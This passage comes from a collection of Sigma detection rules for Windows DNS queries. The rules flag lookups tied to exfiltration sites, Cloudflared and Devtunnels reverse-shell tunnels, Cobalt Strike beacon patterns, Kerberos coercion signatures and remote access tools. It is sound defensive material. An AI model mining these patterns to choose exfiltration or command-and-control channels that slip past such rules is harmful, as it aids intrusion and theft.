    "content": "title: DNS Query for Anonfiles.com Domain - Sysmon\nid: 065cceea-77ec-4030-9052-fc0affea7110\nrelated:\n    - id: 29f171d7-aa47-42c7-9c7b-3c87938164d9\n      type: similar\nstatus: test\ndescription: Detects DNS queries for \"anonfiles.com\", which is an anonymous file upload platform often used for malicious purposes\nreferences:\n    - https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-blackbyte\nauthor: pH-T (Nextron Systems)\ndate: 2022-07-15\nmodified: 2023-01-16\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: '.anonfiles.com'\n    condition: selection\nfalsepositives:\n    - Rare legitimate access to anonfiles.com\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_appinstaller.yml",
    "content": "title: AppX Package Installation Attempts Via AppInstaller.EXE\nid: 7cff77e1-9663-46a3-8260-17f2e1aa9d0a\nrelated:\n    - id: 180c7c5c-d64b-4a63-86e9-68910451bc8b\n      type: derived\nstatus: test\ndescription: |\n    Detects DNS queries made by \"AppInstaller.EXE\". The AppInstaller is the default handler for the \"ms-appinstaller\" URI. It attempts to load/install a package from the referenced URL\nreferences:\n    - https://twitter.com/notwhickey/status/1333900137232523264\n    - https://lolbas-project.github.io/lolbas/Binaries/AppInstaller/\nauthor: frack113\ndate: 2021-11-24\nmodified: 2023-11-09\ntags:\n    - attack.command-and-control\n    - attack.t1105\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|startswith: 'C:\\Program Files\\WindowsApps\\Microsoft.DesktopAppInstaller_'\n        Image|endswith: '\\AppInstaller.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_cloudflared_communication.yml",
    "content": "title: Cloudflared Tunnels Related DNS Requests\nid: a1d9eec5-33b2-4177-8d24-27fe754d0812\nrelated:\n    - id: 7cd1dcdc-6edf-4896-86dc-d1f19ad64903\n      type: similar\nstatus: test\ndescription: |\n    Detects DNS requests to Cloudflared tunnel domains.\n    Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://www.guidepointsecurity.com/blog/tunnel-vision-cloudflared-abused-in-the-wild/\n    - Internal Research\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2023-12-20\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1572\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName|endswith:\n            - '.v2.argotunnel.com'\n            - 'protocol-v2.argotunnel.com'\n            - 'trycloudflare.com'\n            - 'update.argotunnel.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Cloudflare tunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_common_malware_hosting_services.yml",
    "content": "title: DNS Query To Common Malware Hosting and Shortener Services\nid: f8c1e80b-c73a-476a-ae24-6c72528b1521\nstatus: experimental\ndescription: |\n    Detects DNS queries to domains commonly used by threat actors to host malware payloads or redirect through URL shorteners.\n    These include platforms like Cloudflare Workers, TryCloudflare, InfinityFree, and URL shorteners such as tinyurl and lihi.cc.\n    Such DNS activity can indicate potential delivery or command-and-control communication attempts.\nreferences:\n    - https://cloud.google.com/blog/topics/threat-intelligence/apt41-innovative-tactics\nauthor: Ahmed Nosir (@egycondor)\ndate: 2025-06-02\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains:\n            - 'msapp.workers.dev'\n            - 'trycloudflare.com'\n            - 'infinityfreeapp.com'\n            - 'my5353.com'\n            - 'reurl.cc'\n            - 'lihi.cc'\n            - 'tinyurl.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of these services is possible but rare in enterprise environments\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_devtunnels_communication.yml",
    "content": "title: DNS Query To Devtunnels Domain\nid: 1cb0c6ce-3d00-44fc-ab9c-6d6d577bf20b\nrelated:\n    - id: 9501f8e6-8e3d-48fc-a8a6-1089dd5d7ef4 # Net Connection DevTunnels\n      type: similar\n    - id: 4b657234-038e-4ad5-997c-4be42340bce4 # Net Connection VsCode\n      type: similar\n    - id: b3e6418f-7c7a-4fad-993a-93b65027a9f1 # DNS VsCode\n      type: similar\nstatus: test\ndescription: |\n    Detects DNS query requests to Devtunnels domains. Attackers can abuse that feature to establish a reverse shell or persistence on a machine.\nreferences:\n    - https://blueteamops.medium.com/detecting-dev-tunnels-16f0994dc3e2\n    - https://learn.microsoft.com/en-us/azure/developer/dev-tunnels/security\n    - https://cydefops.com/devtunnels-unleashed\nauthor: citron_ninja\ndate: 2023-10-25\nmodified: 2023-11-20\ntags:\n    - attack.command-and-control\n    - attack.t1071.001\n    - attack.t1572\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName|endswith: '.devtunnels.ms'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Devtunnels will also trigger this.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_dns_server_discovery_via_ldap_query.yml",
    "content": "title: DNS Server Discovery Via LDAP Query\nid: a21bcd7e-38ec-49ad-b69a-9ea17e69509e\nstatus: test\ndescription: Detects DNS server discovery via LDAP query requests from uncommon applications\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/980f3f83fd81f37c1ca9c02dccfd1c3d9f9d0841/atomics/T1016/T1016.md#atomic-test-9---dns-server-discovery-using-nslookup\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-adts/7fcdce70-5205-44d6-9c3a-260e616a2f04\nauthor: frack113\ndate: 2022-08-20\nmodified: 2023-09-18\ntags:\n    - attack.discovery\n    - attack.t1482\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|startswith: '_ldap.'\n    filter_main_generic:\n        Image|contains:\n            - ':\\Program Files\\'\n            - ':\\Program Files (x86)\\'\n            - ':\\Windows\\'\n    filter_main_defender:\n        Image|contains: ':\\ProgramData\\Microsoft\\Windows Defender\\Platform\\'\n        Image|endswith: '\\MsMpEng.exe'\n    filter_main_unknown:\n        Image: '<unknown process>'\n    filter_optional_azure:\n        Image|startswith: 'C:\\WindowsAzure\\GuestAgent'\n    filter_main_null:\n        Image: null\n    filter_optional_browsers:\n        # Note: This list is for browsers installed in the user context, to avoid basic evasions based on image name. Best to baseline this list with the browsers you use internally and add their full paths.\n        Image|endswith:\n            - '\\chrome.exe'\n            - '\\firefox.exe'\n            - '\\opera.exe'\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Likely\n# Note: Increase the level once a baseline is established\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_domain_azurewebsites.yml",
    "content": "title: DNS Query To AzureWebsites.NET By Non-Browser Process\nid: e043f529-8514-4205-8ab0-7f7d2927b400\nrelated:\n    - id: 5c80b618-0dbb-46e6-acbb-03d90bcb6d83\n      type: derived\nstatus: test\ndescription: |\n    Detects a DNS query by a non-browser process on the system to \"azurewebsites.net\". The latter was often used by threat actors as a malware hosting and exfiltration site.\nreferences:\n    - https://www.sentinelone.com/labs/wip26-espionage-threat-actors-abuse-cloud-infrastructure-in-targeted-telco-attacks/\n    - https://symantec-enterprise-blogs.security.com/threat-intelligence/harvester-new-apt-attacks-asia\n    - https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/\n    - https://intezer.com/blog/research/how-we-escaped-docker-in-azure-functions/\nauthor: Nasreddine Bencherchali (Nextron Systems)\ndate: 2024-06-24\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|endswith: 'azurewebsites.net'\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_defender:\n        Image|endswith:\n            - '\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n    filter_optional_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_optional_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    filter_optional_tor:\n        Image|contains: '\\Tor Browser\\'\n    filter_optional_whaterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_optional_midori:\n        Image|contains: '\\AppData\\Local\\Programs\\midori-ng\\'\n        Image|endswith: '\\Midori Next Generation.exe'\n    filter_optional_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        Image|endswith: '\\slimbrowser.exe'\n    filter_optional_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: '\\Flock.exe'\n    filter_optional_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_optional_falkon:\n        Image|startswith:\n            - 'C:\\Program Files\\Falkon\\'\n            - 'C:\\Program Files (x86)\\Falkon\\'\n        Image|endswith: '\\falkon.exe'\n    filter_optional_avant:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Avant Browser\\'\n            - 'C:\\Program Files\\Avant Browser\\'\n        Image|endswith: '\\avant.exe'\n    condition: selection and not 1 of filter_optional_*\nfalsepositives:\n    - Likely with other browser software. Apply additional filters for any other browsers you might use.\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_finger.yml",
    "content": "title: DNS Query by Finger Utility\nid: c082c2b0-525b-4dbc-9a26-a57dc4692074\nrelated:\n    - id: 2fdaf50b-9fd5-449f-ba69-f17248119af6\n      type: similar\n    - id: af491bca-e752-4b44-9c86-df5680533dbc\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries made by the finger utility, which can be abused by threat actors to retrieve remote commands for execution on Windows devices.\n    In one ClickFix malware campaign, adversaries leveraged the finger protocol to fetch commands from a remote server.\n    Since the finger utility is not commonly used in modern Windows environments, its presence already raises suspicion.\n    Investigating such DNS queries can also help identify potential malicious infrastructure used by threat actors for command and control (C2) communication.\nreferences:\n    - https://www.bleepingcomputer.com/news/security/decades-old-finger-protocol-abused-in-clickfix-malware-attacks/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-11-19\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\n    - attack.execution\n    - attack.t1059.003\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        Image|endswith: '\\finger.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_gup_query_to_uncommon_domains.yml",
    "content": "title: Notepad++ Updater DNS Query to Uncommon Domains\nid: 2074e137-1b73-4e2d-88ba-5a3407dbdce0\nstatus: experimental\ndescription: |\n    Detects when the Notepad++ updater (gup.exe) makes DNS queries to domains that are not part of the known legitimate update infrastructure.\n    This could indicate potential exploitation of the updater mechanism or suspicious network activity that warrants further investigation.\nreferences:\n    - https://notepad-plus-plus.org/news/v889-released/\n    - https://www.heise.de/en/news/Notepad-updater-installed-malware-11109726.html\n    - https://www.rapid7.com/blog/post/tr-chrysalis-backdoor-dive-into-lotus-blossoms-toolkit/\n    - https://www.validin.com/blog/exploring_notepad_plus_plus_network_indicators/\n    - https://securelist.com/notepad-supply-chain-attack/118708/\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2026-02-02\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.t1195.002\n    - attack.initial-access\n    - attack.t1557\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\gup.exe'\n    filter_main_notepad_legit_domain:\n        QueryName: 'notepad-plus-plus.org'\n    filter_optional_sourceforge_legit_domain:\n        QueryName|endswith: '.sourceforge.net'\n    filter_optional_github_legit_domain:\n        - QueryName|endswith: '.githubusercontent.com'\n        - QueryName: 'github.com'\n    filter_optional_google_storage_legit_domain:\n        QueryName|endswith: '.googleapis.com'\n    # Add other known legitimate domains if any\n    condition: selection and not 1 of filter_main_* and not 1 of filter_optional_*\nfalsepositives:\n    - Some legitimate network misconfigurations or proxy issues causing unexpected DNS queries.\n    - Other legitimate queries to official domains not listed in the filter, needing tuning.\nlevel: medium # can be upgraded to high after tuning with known legitimate DNS queries\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_hybridconnectionmgr_servicebus.yml",
    "content": "title: DNS HybridConnectionManager Service Bus\nid: 7bd3902d-8b8b-4dd4-838a-c6862d40150d\nstatus: test\ndescription: Detects Azure Hybrid Connection Manager services querying the Azure service bus service\nreferences:\n    - https://twitter.com/Cyb3rWard0g/status/1381642789369286662\nauthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)\ndate: 2021-04-12\nmodified: 2023-01-16\ntags:\n    - attack.persistence\n    - attack.t1554\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: 'servicebus.windows.net'\n        Image|contains: 'HybridConnectionManager'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Azure Hybrid Connection Manager and the Azure Service Bus service\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_kerberos_coercion_via_dns_object_spoofing.yml",
    "content": "title: Suspicious DNS Query Indicating Kerberos Coercion via DNS Object SPN Spoofing\nid: e7a21b5f-d8c4-4ae5-b8d9-93c5d3f28e1c\nrelated:\n    - id: b07e58cf-cacc-4135-8473-ccb2eba63dd2 # Potential Kerberos Coercion via DNS Object Spoofing\n      type: similar\n    - id: 5588576c-5898-4fac-bcdd-7475a60e8f43 # Suspicious DNS Query Indicating Kerberos Coercion via DNS Object Spoofing - Network\n      type: similar\nstatus: experimental\ndescription: |\n    Detects DNS queries containing patterns associated with Kerberos coercion attacks via DNS object spoofing.\n    The pattern \"1UWhRCAAAAA..BAAAA\" is a base64-encoded signature that corresponds to a marshaled CREDENTIAL_TARGET_INFORMATION structure.\n    Attackers can use this technique to coerce authentication from victim systems to attacker-controlled hosts.\n    It is one of the strong indicators of a Kerberos coercion attack, where adversaries manipulate DNS records\n    to spoof Service Principal Names (SPNs) and redirect authentication requests, as in CVE-2025-33073.\nreferences:\n    - https://www.synacktiv.com/publications/ntlm-reflection-is-dead-long-live-ntlm-reflection-an-in-depth-analysis-of-cve-2025\n    - https://googleprojectzero.blogspot.com/2021/10/using-kerberos-for-authentication-relay.html\nauthor: Swachchhanda Shrawan Poudel (Nextron Systems)\ndate: 2025-06-20\ntags:\n    - attack.collection\n    - attack.credential-access\n    - attack.persistence\n    - attack.privilege-escalation\n    - attack.t1557.001\n    - attack.t1187\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains|all:\n            - 'UWhRCA'\n            - 'BAAAA'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_mal_cobaltstrike.yml",
    "content": "title: Suspicious Cobalt Strike DNS Beaconing - Sysmon\nid: f356a9c4-effd-4608-bbf8-408afd5cd006\nrelated:\n    - id: 0d18728b-f5bf-4381-9dcf-915539fff6c2\n      type: similar\nstatus: test\ndescription: Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons\nreferences:\n    - https://www.icebrg.io/blog/footprints-of-fin7-tracking-actor-patterns\n    - https://www.sekoia.io/en/hunting-and-detecting-cobalt-strike/\nauthor: Florian Roth (Nextron Systems)\ndate: 2021-11-09\nmodified: 2023-01-16\ntags:\n    - attack.command-and-control\n    - attack.t1071.004\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection1:\n        QueryName|startswith:\n            - 'aaa.stage.'\n            - 'post.1'\n    selection2:\n        QueryName|contains: '.stage.123456.'\n    condition: 1 of selection*\nfalsepositives:\n    - Unknown\nlevel: critical\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_mega_nz.yml",
    "content": "title: DNS Query To MEGA Hosting Website\nid: 613c03ba-0779-4a53-8a1f-47f914a4ded3\nrelated:\n    - id: 66474410-b883-415f-9f8d-75345a0a66a6\n      type: similar\nstatus: test\ndescription: Detects DNS queries for subdomains related to the MEGA file sharing website\nreferences:\n    - https://research.nccgroup.com/2021/05/27/detecting-rclone-an-effective-tool-for-exfiltration/\nauthor: Aaron Greetham (@beardofbinary) - NCC Group\ndate: 2021-05-26\nmodified: 2023-09-18\ntags:\n    - attack.exfiltration\n    - attack.t1567.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection:\n        QueryName|contains: 'userstorage.mega.co.nz'\n    condition: selection\nfalsepositives:\n    - Legitimate DNS queries and usage of Mega\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_onelaunch_update_service.yml",
    "content": "title: DNS Query Request To OneLaunch Update Service\nid: df68f791-ad95-447f-a271-640a0dab9cf8\nstatus: test\ndescription: |\n    Detects DNS query requests to \"update.onelaunch.com\". This domain is associated with the OneLaunch adware application.\n    When the OneLaunch application is installed it will attempt to get updates from this domain.\nreferences:\n    - https://www.malwarebytes.com/blog/detections/pup-optional-onelaunch-silentcf\n    - https://www.myantispyware.com/2020/12/14/how-to-uninstall-onelaunch-browser-removal-guide/\n    - https://malware.guide/browser-hijacker/remove-onelaunch-virus/\nauthor: Josh Nickels\ndate: 2024-02-26\ntags:\n    - attack.credential-access\n    - attack.collection\n    - attack.t1056\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        QueryName: 'update.onelaunch.com'\n        Image|endswith: '\\OneLaunch.exe'\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_quickassist.yml",
    "content": "title: DNS Query Request By QuickAssist.EXE\nid: 882e858a-3233-4ba8-855e-2f3d3575803d\nstatus: experimental\ndescription: |\n    Detects DNS queries initiated by \"QuickAssist.exe\" to the Microsoft Quick Assist primary endpoint that is used to establish a session.\nreferences:\n    - https://www.microsoft.com/en-us/security/blog/2024/05/15/threat-actors-misusing-quick-assist-in-social-engineering-attacks-leading-to-ransomware/\n    - https://www.linkedin.com/posts/kevin-beaumont-security_ive-been-assisting-a-few-orgs-hit-with-successful-activity-7268055739116445701-xxjZ/\n    - https://x.com/cyb3rops/status/1862406110365245506\n    - https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist\nauthor: Muhammad Faisal (@faisalusuf)\ndate: 2024-12-19\ntags:\n    - attack.command-and-control\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.t1071.001\n    - attack.t1210\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\QuickAssist.exe'\n        QueryName|endswith: 'remoteassistance.support.services.microsoft.com'\n    condition: selection\nfalsepositives:\n    - Legitimate use of Quick Assist in the environment.\nlevel: low\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_regsvr32_dns_query.yml",
    "content": "title: DNS Query Request By Regsvr32.EXE\nid: 36e037c4-c228-4866-b6a3-48eb292b9955\nrelated:\n    - id: c7e91a02-d771-4a6d-a700-42587e0b1095\n      type: derived\nstatus: test\ndescription: Detects DNS queries initiated by \"Regsvr32.exe\"\nreferences:\n    - https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/\n    - https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/\nauthor: Dmitriy Lifanov, oscd.community\ndate: 2019-10-25\nmodified: 2023-09-18\ntags:\n    - attack.execution\n    - attack.t1559.001\n    - attack.defense-evasion\n    - attack.t1218.010\nlogsource:\n    category: dns_query\n    product: windows\ndetection:\n    selection:\n        Image|endswith: '\\regsvr32.exe'\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: medium\n"
  },
  {
    "path": "rules/windows/dns_query/dns_query_win_remote_access_software_domains_non_browsers.yml",
    "content": "title: DNS Query To Remote Access Software Domain From Non-Browser App\nid: 4d07b1f4-cb00-4470-b9f8-b0191d48ff52\nrelated:\n    - id: 71ba22cb-8a01-42e2-a6dd-5bf9b547498f\n      type: obsolete\n    - id: 7c4cf8e0-1362-48b2-a512-b606d2065d7d\n      type: obsolete\n    - id: ed785237-70fa-46f3-83b6-d264d1dc6eb4\n      type: obsolete\nstatus: test\ndescription: |\n    An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\n    These services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\n    Remote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\nreferences:\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-4---gotoassist-files-detected-test-on-windows\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-3---logmein-files-detected-test-on-windows\n    - https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1219/T1219.md#atomic-test-6---ammyy-admin-software-execution\n    - https://redcanary.com/blog/misbehaving-rats/\n    - https://techcommunity.microsoft.com/t5/microsoft-sentinel-blog/hunting-for-omi-vulnerability-exploitation-with-azure-sentinel/ba-p/2764093\n    - https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-320a\n    - https://blog.sekoia.io/scattered-spider-laying-new-eggs/\n    - https://learn.microsoft.com/en-us/windows/client-management/client-tools/quick-assist#disable-quick-assist-within-your-organization\nauthor: frack113, Connor 
Martin\ndate: 2022-07-11\nmodified: 2024-12-17\ntags:\n    - attack.command-and-control\n    - attack.t1219.002\nlogsource:\n    product: windows\n    category: dns_query\ndetection:\n    selection_generic:\n        QueryName|endswith:\n            - 'agent.jumpcloud.com'\n            - 'agentreporting.atera.com'\n            - 'ammyy.com'\n            - 'api.parsec.app'\n            - 'api.playanext.com'\n            - 'api.splashtop.com'\n            - 'app.atera.com'\n            - 'assist.zoho.com'\n            - 'authentication.logmeininc.com'\n            - 'beyondtrustcloud.com'\n            - 'cdn.kaseya.net'\n            - 'client.teamviewer.com'\n            - 'comserver.corporate.beanywhere.com'\n            - 'control.connectwise.com'\n            - 'downloads.zohocdn.com'\n            - 'dwservice.net'\n            - 'express.gotoassist.com'\n            - 'getgo.com'\n            - 'getscreen.me'  # https://x.com/malmoeb/status/1868757130624614860?s=12&t=C0_T_re0wRP_NfKa27Xw9w\n            - 'integratedchat.teamviewer.com'\n            - 'join.zoho.com'\n            - 'kickstart.jumpcloud.com'\n            - 'license.bomgar.com'\n            - 'logmein-gateway.com'\n            - 'logmein.com'\n            - 'logmeincdn.http.internapcdn.net'\n            - 'n-able.com'\n            - 'net.anydesk.com'\n            - 'netsupportsoftware.com' # For NetSupport Manager RAT\n            - 'parsecusercontent.com'\n            - 'pubsub.atera.com'\n            - 'relay.kaseya.net'\n            - 'relay.screenconnect.com'\n            - 'relay.splashtop.com'\n            - 'remoteassistance.support.services.microsoft.com' # Quick Assist Application\n            - 'remotedesktop-pa.googleapis.com'\n            - 'remoteutilities.com' # Usage of Remote Utilities RAT\n            - 'secure.logmeinrescue.com'\n            - 'services.vnc.com'\n            - 'static.remotepc.com'\n            - 'swi-rc.com'\n            - 'swi-tc.com'\n            - 
'tailscale.com' # Scattered Spider threat group used this RMM tool\n            - 'telemetry.servers.qetqo.com'\n            - 'tmate.io'\n            - 'twingate.com'  # Scattered Spider threat group used this RMM tool\n            - 'zohoassist.com'\n    selection_rustdesk:  # https://twitter.com/malmoeb/status/1668504345132822531?s=20 and https://www.adamsdesk.com/posts/rustdesk-not-connecting/ mention this pattern\n        QueryName|endswith: '.rustdesk.com'\n        QueryName|startswith: 'rs-'\n    # Exclude browsers for legitimate visits of the domains mentioned above\n    # Add missing browsers you use and exclude the ones you don't\n    filter_optional_chrome:\n        Image:\n            - 'C:\\Program Files\\Google\\Chrome\\Application\\chrome.exe'\n            - 'C:\\Program Files (x86)\\Google\\Chrome\\Application\\chrome.exe'\n    filter_optional_firefox:\n        Image:\n            - 'C:\\Program Files\\Mozilla Firefox\\firefox.exe'\n            - 'C:\\Program Files (x86)\\Mozilla Firefox\\firefox.exe'\n    filter_optional_ie:\n        Image:\n            - 'C:\\Program Files (x86)\\Internet Explorer\\iexplore.exe'\n            - 'C:\\Program Files\\Internet Explorer\\iexplore.exe'\n    filter_optional_edge_1:\n        - Image|startswith: 'C:\\Program Files (x86)\\Microsoft\\EdgeWebView\\Application\\'\n        - Image|endswith: '\\WindowsApps\\MicrosoftEdge.exe'\n        - Image:\n              - 'C:\\Program Files (x86)\\Microsoft\\Edge\\Application\\msedge.exe'\n              - 'C:\\Program Files\\Microsoft\\Edge\\Application\\msedge.exe'\n    filter_optional_edge_2:\n        Image|startswith:\n            - 'C:\\Program Files (x86)\\Microsoft\\EdgeCore\\'\n            - 'C:\\Program Files\\Microsoft\\EdgeCore\\'\n        Image|endswith:\n            - '\\msedge.exe'\n            - '\\msedgewebview2.exe'\n    filter_optional_safari:\n        Image|endswith: '\\safari.exe'\n    filter_optional_defender:\n        Image|endswith:\n            - 
'\\MsMpEng.exe' # Microsoft Defender executable\n            - '\\MsSense.exe' # Windows Defender Advanced Threat Protection Service Executable\n    filter_optional_brave:\n        Image|endswith: '\\brave.exe'\n        Image|startswith: 'C:\\Program Files\\BraveSoftware\\'\n    filter_optional_maxthon:\n        Image|contains: '\\AppData\\Local\\Maxthon\\'\n        Image|endswith: '\\maxthon.exe'\n    filter_optional_opera:\n        Image|contains: '\\AppData\\Local\\Programs\\Opera\\'\n        Image|endswith: '\\opera.exe'\n    filter_optional_seamonkey:\n        Image|startswith:\n            - 'C:\\Program Files\\SeaMonkey\\'\n            - 'C:\\Program Files (x86)\\SeaMonkey\\'\n        Image|endswith: '\\seamonkey.exe'\n    filter_optional_vivaldi:\n        Image|contains: '\\AppData\\Local\\Vivaldi\\'\n        Image|endswith: '\\vivaldi.exe'\n    filter_optional_whale:\n        Image|startswith:\n            - 'C:\\Program Files\\Naver\\Naver Whale\\'\n            - 'C:\\Program Files (x86)\\Naver\\Naver Whale\\'\n        Image|endswith: '\\whale.exe'\n    filter_optional_tor:\n        Image|contains: '\\Tor Browser\\'\n    filter_optional_whaterfox:\n        Image|startswith:\n            - 'C:\\Program Files\\Waterfox\\'\n            - 'C:\\Program Files (x86)\\Waterfox\\'\n        Image|endswith: '\\Waterfox.exe'\n    filter_optional_midori:\n        Image|contains: '\\AppData\\Local\\Programs\\midori-ng\\'\n        Image|endswith: '\\Midori Next Generation.exe'\n    filter_optional_slimbrowser:\n        Image|startswith:\n            - 'C:\\Program Files\\SlimBrowser\\'\n            - 'C:\\Program Files (x86)\\SlimBrowser\\'\n        Image|endswith: '\\slimbrowser.exe'\n    filter_optional_flock:\n        Image|contains: '\\AppData\\Local\\Flock\\'\n        Image|endswith: '\\Flock.exe'\n    filter_optional_phoebe:\n        Image|contains: '\\AppData\\Local\\Phoebe\\'\n        Image|endswith: '\\Phoebe.exe'\n    filter_optional_falkon:\n        
